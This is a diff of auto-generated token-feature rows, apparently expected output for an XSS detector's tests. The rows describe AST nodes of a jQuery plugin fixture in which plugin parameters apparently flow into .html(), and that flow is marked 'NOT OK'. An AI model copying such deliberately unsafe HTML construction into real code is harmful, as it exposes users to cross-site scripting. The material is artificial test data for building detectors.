contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:3:3:3:42 | exceptional return of define( ... actory) | enclosingFunctionBody | factory define function define amd define jquery jquery-ui factory factory jQuery | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:3:3:3:42 | exceptional return of define( ... actory) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:3:3:3:42 | exceptional return of define( ... actory) | fileImports | jquery jquery-ui | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:3:10:3:32 | ['jquer ... ry-ui'] | CalleeFlexibleAccessPath | define | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:3:10:3:32 | ['jquer ... ry-ui'] | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:3:10:3:32 | ['jquer ... ry-ui'] | contextFunctionInterfaces | myPlugin(stuff, options) | @@ -22548,14 +149736,24 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:3:10:3:32 | ['jquer ... ry-ui'] | enclosingFunctionName | | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:3:10:3:32 | ['jquer ... ry-ui'] | fileImports | jquery jquery-ui | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:3:11:3:18 | 'jquery' | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:3:11:3:18 | 'jquery' | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:3:11:3:18 | 'jquery' | contextSurroundingFunctionParameters | | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:3:11:3:18 | 'jquery' | contextSurroundingFunctionParameters | (factory) | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:3:11:3:18 | 'jquery' | enclosingFunctionBody | factory define function define amd define jquery jquery-ui factory factory jQuery | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:3:11:3:18 | 'jquery' | enclosingFunctionBody | factory define function define amd define jquery jquery-ui factory factory jQuery | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:3:11:3:18 | 'jquery' | enclosingFunctionName | | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:3:11:3:18 | 'jquery' | enclosingFunctionName | | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:3:11:3:18 | 'jquery' | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:3:11:3:18 | 'jquery' | fileImports | jquery jquery-ui | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:3:21:3:31 | 'jquery-ui' | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:3:21:3:31 | 'jquery-ui' | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:3:21:3:31 | 'jquery-ui' | contextSurroundingFunctionParameters | | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:3:21:3:31 | 'jquery-ui' | contextSurroundingFunctionParameters | (factory) | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:3:21:3:31 | 'jquery-ui' | enclosingFunctionBody | factory define function define amd define jquery jquery-ui factory factory jQuery | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:3:21:3:31 | 'jquery-ui' | enclosingFunctionBody | factory define function define amd define jquery jquery-ui factory factory jQuery | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:3:21:3:31 | 'jquery-ui' | enclosingFunctionName | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:3:21:3:31 | 'jquery-ui' | enclosingFunctionName | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:3:21:3:31 | 'jquery-ui' | fileImports | jquery jquery-ui | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:3:21:3:31 | 'jquery-ui' | fileImports | jquery jquery-ui | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:3:35:3:41 | factory | CalleeFlexibleAccessPath | define | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:3:35:3:41 | factory | InputArgumentIndex | 1 | @@ -22564,12 +149762,88 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:3:35:3:41 | factory | enclosingFunctionBody | factory define function define amd define jquery jquery-ui factory factory jQuery | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:3:35:3:41 | factory | enclosingFunctionName | | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:3:35:3:41 | factory | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:5:3:5:9 | factory | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:5:3:5:9 | factory | contextSurroundingFunctionParameters | (factory) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:5:3:5:9 | factory | enclosingFunctionBody | factory define function define amd define jquery jquery-ui factory factory jQuery | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:5:3:5:9 | factory | enclosingFunctionName | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:5:3:5:9 | factory | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:5:3:5:17 | exceptional return of factory(jQuery) | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:5:3:5:17 | exceptional return of factory(jQuery) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:5:3:5:17 | exceptional return of factory(jQuery) | enclosingFunctionBody | factory define function define amd define jquery jquery-ui factory factory jQuery | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:5:3:5:17 | exceptional return of factory(jQuery) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:5:3:5:17 | exceptional return of factory(jQuery) | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:5:3:5:17 | factory(jQuery) | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:5:3:5:17 | factory(jQuery) | contextSurroundingFunctionParameters | (factory) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:5:3:5:17 | factory(jQuery) | enclosingFunctionBody | factory define function define amd define jquery jquery-ui factory factory jQuery | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:5:3:5:17 | factory(jQuery) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:5:3:5:17 | factory(jQuery) | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:5:11:5:16 | jQuery | CalleeFlexibleAccessPath | factory | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:5:11:5:16 | jQuery | InputArgumentIndex | 0 | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:5:11:5:16 | jQuery | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:5:11:5:16 | jQuery | contextSurroundingFunctionParameters | (factory) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:5:11:5:16 | jQuery | enclosingFunctionBody | factory define function define amd define jquery jquery-ui factory factory jQuery | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:5:11:5:16 | jQuery | enclosingFunctionName | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:5:11:5:16 | jQuery | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:7:3:7:2 | this | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:7:3:7:2 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:7:3:7:2 | this | enclosingFunctionBody | $ $ $ trim foo | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:7:3:7:2 | this | enclosingFunctionName | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:7:3:7:2 | this | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:7:3:9:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:7:3:9:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:7:3:9:1 | 'arguments' object of anonymous function | enclosingFunctionBody | $ $ $ trim foo | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:7:3:9:1 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:7:3:9:1 | 'arguments' object of anonymous function | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:7:3:9:1 | exceptional return of anonymous function | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:7:3:9:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:7:3:9:1 | exceptional return of anonymous function | enclosingFunctionBody | $ $ $ trim foo | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:7:3:9:1 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:7:3:9:1 | exceptional return of anonymous function | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:7:3:9:1 | functio ... // OK\\n} | InputArgumentIndex | 0 | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:7:3:9:1 | functio ... // OK\\n} | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:7:3:9:1 | functio ... // OK\\n} | contextSurroundingFunctionParameters | ($) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:7:3:9:1 | functio ... // OK\\n} | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:7:3:9:1 | return of anonymous function | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:7:3:9:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:7:3:9:1 | return of anonymous function | enclosingFunctionBody | $ $ $ trim foo | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:7:3:9:1 | return of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:7:3:9:1 | return of anonymous function | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:7:13:7:13 | $ | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:7:13:7:13 | $ | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:7:13:7:13 | $ | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:7:13:7:13 | $ | contextSurroundingFunctionParameters | ($) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:7:13:7:13 | $ | enclosingFunctionBody | $ $ $ trim foo | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:7:13:7:13 | $ | enclosingFunctionBody | $ $ $ trim foo | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:7:13:7:13 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:7:13:7:13 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:7:13:7:13 | $ | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:7:13:7:13 | $ | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:5:8:5 | $ | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:5:8:5 | $ | contextSurroundingFunctionParameters | ($) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:5:8:5 | $ | enclosingFunctionBody | $ $ $ trim foo | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:5:8:5 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:5:8:5 | $ | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:5:8:43 | $("") | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:5:8:43 | $("") | contextSurroundingFunctionParameters | ($) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:5:8:43 | $("") | enclosingFunctionBody | $ $ $ trim foo | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:5:8:43 | $("") | enclosingFunctionName | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:5:8:43 | $("") | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:5:8:43 | exceptional return of $("") | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:5:8:43 | exceptional return of $("") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:5:8:43 | exceptional return of $("") | enclosingFunctionBody | $ $ $ trim foo | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:5:8:43 | exceptional return of $("") | enclosingFunctionName | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:5:8:43 | exceptional return of $("") | fileImports | jquery jquery-ui | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:7:8:14 | "" | contextFunctionInterfaces | myPlugin(stuff, options) | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:7:8:14 | "" | contextSurroundingFunctionParameters | ($) | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:7:8:14 | "" | enclosingFunctionBody | $ $ $ trim foo | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:7:8:14 | "" | enclosingFunctionName | | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:7:8:14 | "" | fileImports | jquery jquery-ui | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:7:8:14 | "" | stringConcatenatedWith | -endpoint- $.trim() + '' | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:7:8:30 | " ... ("foo") | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:7:8:30 | " ... ("foo") | contextSurroundingFunctionParameters | ($) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:7:8:30 | " ... ("foo") | enclosingFunctionBody | $ $ $ trim foo | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:7:8:30 | " ... ("foo") | enclosingFunctionName | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:7:8:30 | " ... ("foo") | fileImports | jquery jquery-ui | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:7:8:42 | " ... /span>" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:7:8:42 | " ... /span>" | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:7:8:42 | " ... /span>" | calleeImports | jquery | @@ -22578,12 +149852,32 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:7:8:42 | " ... /span>" | enclosingFunctionBody | $ $ $ trim foo | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:7:8:42 | " ... /span>" | enclosingFunctionName | | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:7:8:42 | " ... /span>" | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:18:8:18 | $ | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:18:8:18 | $ | contextSurroundingFunctionParameters | ($) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:18:8:18 | $ | enclosingFunctionBody | $ $ $ trim foo | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:18:8:18 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:18:8:18 | $ | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:18:8:23 | $.trim | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:18:8:23 | $.trim | contextSurroundingFunctionParameters | ($) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:18:8:23 | $.trim | enclosingFunctionBody | $ $ $ trim foo | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:18:8:23 | $.trim | enclosingFunctionName | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:18:8:23 | $.trim | fileImports | jquery jquery-ui | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:18:8:30 | $.trim("foo") | contextFunctionInterfaces | myPlugin(stuff, options) | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:18:8:30 | $.trim("foo") | contextSurroundingFunctionParameters | ($) | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:18:8:30 | $.trim("foo") | enclosingFunctionBody | $ $ $ trim foo | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:18:8:30 | $.trim("foo") | enclosingFunctionName | | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:18:8:30 | $.trim("foo") | fileImports | jquery jquery-ui | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:18:8:30 | $.trim("foo") | stringConcatenatedWith | '' -endpoint- '' | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:18:8:30 | exceptional return of $.trim("foo") | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:18:8:30 | exceptional return of $.trim("foo") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:18:8:30 | exceptional return of $.trim("foo") | enclosingFunctionBody | $ $ $ trim foo | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:18:8:30 | exceptional return of $.trim("foo") | enclosingFunctionName | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:18:8:30 | exceptional return of $.trim("foo") | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:20:8:23 | trim | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:20:8:23 | trim | contextSurroundingFunctionParameters | ($) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:20:8:23 | trim | enclosingFunctionBody | $ $ $ trim foo | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:20:8:23 | trim | enclosingFunctionName | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:20:8:23 | trim | fileImports | jquery jquery-ui | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:25:8:29 | "foo" | CalleeFlexibleAccessPath | $.trim | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:25:8:29 | "foo" | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:25:8:29 | "foo" | calleeImports | jquery | @@ -22599,6 +149893,98 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:34:8:42 | "" | enclosingFunctionName | | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:34:8:42 | "" | fileImports | jquery jquery-ui | | autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:8:34:8:42 | "" | stringConcatenatedWith | '' + $.trim() -endpoint- | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:1:11:1 | $ | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:1:11:1 | $ | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:1:11:1 | $ | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:1:11:4 | $.fn | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:1:11:4 | $.fn | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:1:11:4 | $.fn | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:1:11:13 | $.fn.myPlugin | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:1:11:13 | $.fn.myPlugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:1:11:13 | $.fn.myPlugin | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:1:15:1 | $.fn.my ... OT OK\\n} | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:1:15:1 | $.fn.my ... OT OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:1:15:1 | $.fn.my ... OT OK\\n} | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:3:11:4 | fn | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:3:11:4 | fn | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:3:11:4 | fn | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:6:11:13 | myPlugin | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:6:11:13 | myPlugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:6:11:13 | myPlugin | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:17:11:16 | this | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:17:11:16 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:17:11:16 | this | enclosingFunctionBody | stuff options $ #foo html options foo $ #foo html stuff | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:17:11:16 | this | enclosingFunctionName | myPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:17:11:16 | this | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:17:15:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:17:15:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:17:15:1 | 'arguments' object of anonymous function | enclosingFunctionBody | stuff options $ #foo html options foo $ #foo html stuff | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:17:15:1 | 'arguments' object of anonymous function | enclosingFunctionName | myPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:17:15:1 | 'arguments' object of anonymous function | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:17:15:1 | exceptional return of anonymous function | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:17:15:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:17:15:1 | exceptional return of anonymous function | enclosingFunctionBody | stuff options $ #foo html options foo $ #foo html stuff | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:17:15:1 | exceptional return of anonymous function | enclosingFunctionName | myPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:17:15:1 | exceptional return of anonymous function | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:17:15:1 | functio ... OT OK\\n} | assignedToPropName | myPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:17:15:1 | functio ... OT OK\\n} | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:17:15:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | (stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:17:15:1 | functio ... OT OK\\n} | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:17:15:1 | return of anonymous function | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:17:15:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:17:15:1 | return of anonymous function | enclosingFunctionBody | stuff options $ #foo html options foo $ #foo html stuff | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:17:15:1 | return of anonymous function | enclosingFunctionName | myPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:17:15:1 | return of anonymous function | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:27:11:31 | stuff | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:27:11:31 | stuff | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:27:11:31 | stuff | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:27:11:31 | stuff | contextSurroundingFunctionParameters | (stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:27:11:31 | stuff | enclosingFunctionBody | stuff options $ #foo html options foo $ #foo html stuff | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:27:11:31 | stuff | enclosingFunctionBody | stuff options $ #foo html options foo $ #foo html stuff | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:27:11:31 | stuff | enclosingFunctionName | myPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:27:11:31 | stuff | enclosingFunctionName | myPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:27:11:31 | stuff | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:27:11:31 | stuff | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:34:11:40 | options | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:34:11:40 | options | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:11:34:11:40 | options | contextSurroundingFunctionParameters | | +| 